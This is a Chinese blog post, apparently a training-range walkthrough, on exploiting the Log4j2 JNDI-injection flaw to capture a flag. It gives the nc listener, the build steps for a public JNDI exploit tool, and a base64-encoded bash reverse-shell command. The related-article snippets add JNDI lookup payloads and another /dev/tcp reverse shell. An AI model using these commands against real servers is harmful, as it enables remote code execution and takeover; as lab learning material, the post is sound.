前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >靶场使用指南

靶场使用指南

作者头像
逍遥子大表哥
发布于 2022-10-04 13:29:19
发布于 2022-10-04 13:29:19
78800
代码可运行
举报
文章被收录于专栏:kali blogkali blog
运行总次数:0
代码可运行

由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

登录靶场

选择我们的镜像系统,点击启动。

在kali中监听7777端口

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc -lvvp 7777

下载漏洞利用框架

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
git clone https://github.com/welk1n/JNDI-Injection-Exploit

安装maven

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
apt-get install maven

maven可以将java项目打包为jar文件。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
cd JNDI-Injection-Exploit
mvn clean package -DskipTests#编译项目

打包完成后,会在/target/目录生成JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar文件。

攻击命令如下

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzcvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"  -A  192.168.137.137

参数说明:

这个安装在kali上面的jndi服务器是利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来启动起来的,启动参数包括-C是执行的bash命令,-c参数后面是执行的具体命令,用双引号引起来 -A 指服务器的IP。

需要注意的是,我们要对shell进行base64编码。(靶场在公网,本地的kali需要内网映射哦!)

如下,我们成功得到了flag

提交后,可解锁所有关卡。


版权属于:逍遥子大表哥

本文链接:https://cloud.tencent.com/developer/article/2134264

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
这里做一个复现学习的小文章,由于对java这方面的知识雀食是薄弱,而且本地复现时,出现了挺多问题,在本地复现时,不知道是什么原因,利用payload去打的时候,总是说loggxxx模块不存在...idea也犯毛病...果断直接用网上的靶机去复现一波
vFREE
2021/12/20
15.2K0
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
log4j远程代码执行漏洞原理详解及复现
JNDI: java命名和目录接口,通过访问JNDI,根据命名服务或目录服务来获取相应的资源。命名服务:键值对绑定key = value,通过键名检索值,RMI(远程方法调用)就是典型的命名服务。
红队蓝军
2024/08/01
1.2K0
log4j远程代码执行漏洞原理详解及复现
【揭秘三】练武靶场
Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测 试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行 任意命令。
Ms08067安全实验室
2024/12/19
1170
【揭秘三】练武靶场
log4j2(CVE-2021-44228)漏洞复现实操(小白向)
Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。
网e渗透安全部
2022/06/15
6.7K0
log4j2(CVE-2021-44228)漏洞复现实操(小白向)
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
这里做一个复现学习的小文章,由于对java这方面的知识雀食是薄弱,而且本地复现时,出现了挺多问题,在本地复现时,不知道是什么原因,利用payload去打的时候,总是说loggxxx模块不存在...idea也犯毛病...果断直接用网上的靶机去复现一波
vFREE
2021/12/19
10.8K0
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
Apache Log4j2-任意代码执行-漏洞复现
相信大家都不陌生,log4j2 ,核弹级漏洞,2021年12月9日,国内多家机构监测到Apache Log4j存在任意代码执行漏洞,并紧急通报相关情况。由于Apache Log4j存在递归解析功能,未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最终在目标上执行任意代码。
用户8478399
2022/09/22
7120
Apache Log4j2-任意代码执行-漏洞复现
Log4j-JNDI注入RCE
漏洞简介 影响版本 Apache Log4j 2.14.1 Apache Log4j Security Vulnerabilities log4shell - Quick Guide 漏洞利用 Log4j 2.14.1 - RCE CVE-2021-44228 POC ${jndi:ldap://xxx.dnslog.cn/exp} # Bypass ${j${lower:n}di:l${lower:d}ap://xxx.dnslog.cn/exp} RCE 首先Netcat监听端口 $ nc -lvn
Naraku
2022/02/24
1.9K0
Log4j-JNDI注入RCE
JAVA常见漏洞复现
Shiro550漏洞原理是Shiro框架提供了一种记住密码(Rememberme)的功能,用户登录成功后会生成经过加密的Cookie值,对Remembe的Cookie进行AES解密、Base64解密后再反序列化,就导致了反序列化RCE漏洞 。 Shiro<1.2.4版本,其使用的密钥为固定密钥Shiro550kPH+bIxk5D2deZiIxcaaaA==,这就更容易导致RCE漏洞
用户9691112
2023/05/18
1.8K0
JAVA常见漏洞复现
weblogic-CVE-2021-2109漏洞分析
在vulhub里找一个weblogic靶场进行搭建,本次实验使用的是14883靶场
Khan安全团队
2021/02/12
5180
weblogic-CVE-2021-2109漏洞分析
Log4j2 漏洞实战案例
在现在以及未来的一段时间里,Log4j2 漏洞依然是渗透和排查的重点。在测试靶场里复现多次,在实战中遇到还是十分兴奋,So,总得记录点什么吧。
Bypass
2022/04/19
1.1K0
Log4j2 漏洞实战案例
CVE-2021-21351-Stream 反序列化命令执行漏洞复现
今天给大家介绍,XStream是一个简单易用的开源java类库,在解析XML文本时使用黑名单机制来防御反序列化漏洞,但之前的版本黑名单存在缺陷所以造成反序列化命令执行错误,下午具体来看一下复现过程吧。
雨笋教育
2021/12/02
1.8K0
CVE-2021-21351-Stream 反序列化命令执行漏洞复现
推荐|一款比ysoserial更高更快更强的反序列化工具
一提到java反序列化,第一个想到的工具肯定是ysoserial,其中包含了很多Gadget利用链,在复现&实战中用到的频率极高。
用户8478399
2022/09/27
1.6K0
推荐|一款比ysoserial更高更快更强的反序列化工具
Bugku---Apache Log4j2 RCE
1.bugku---Apache Log4j2 RCE 1.1 打开题目 image.png 注意:描述中的命令后面跟的×说明不支持这个命令,√则代表可以使用 1.2 构建一个JNDI服务 Github: https://github.com/welk1n/JNDI-Injection-Exploit 1.2.1 构建 1.cd JNDI-Injection-Exploit 2.mvn clean package -DskipTests 3.java -jar target/JNDI-Injection-E
vFREE
2022/08/08
4890
Bugku---Apache Log4j2 RCE
漏洞复现
验证有漏洞之后,就尝试反弹shell。这里使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行进一步的漏洞利用。
用户8478947
2022/12/29
4690
CVE-2021-29505:XStream反序列化命令执行漏洞复现
XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。
Timeline Sec
2021/06/25
3.3K0
Log4j2漏洞复现
由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。 https://mp.weixin.qq.com/s/15zcLEk6_x2enszhim9afA
R0A1NG
2022/02/19
2K0
Log4j2漏洞复现
Apache Log4j2网络安全事件
echo -n 'bash -i >& /dev/tcp/123.180.208.153/7777 0>&1' | base64
MRy
2024/08/19
2400
记一次密码读取+SSRF渗透测试
记一次授权的渗透测试,目标网站使用了某凌OA(EKP)办公系统,版本存在任意文件读取和SSRF+JNDI远程命令执行安全缺陷,本文仅对这方面做相关描述,针对此网站系统进行的信息收集覆盖面和其他测试小工具就不再赘述了... 【旺柴】——手动狗头,厚码见谅,大佬轻喷~
潇湘信安
2021/08/20
8450
CNVD-2019-22238 fastjson反序列化漏洞
验证有漏洞之后,就尝试反弹shell。这里使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行进一步的漏洞利用。
用户8478947
2022/12/29
6200
shiro_550反序列化复现.md
漏洞出现在cookie中的RememberMe字段中,说的简单通俗易懂些,当服务端获取到RememberMe后,会进行如下操作
sugarbeet
2022/09/26
2890
shiro_550反序列化复现.md
相关推荐
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验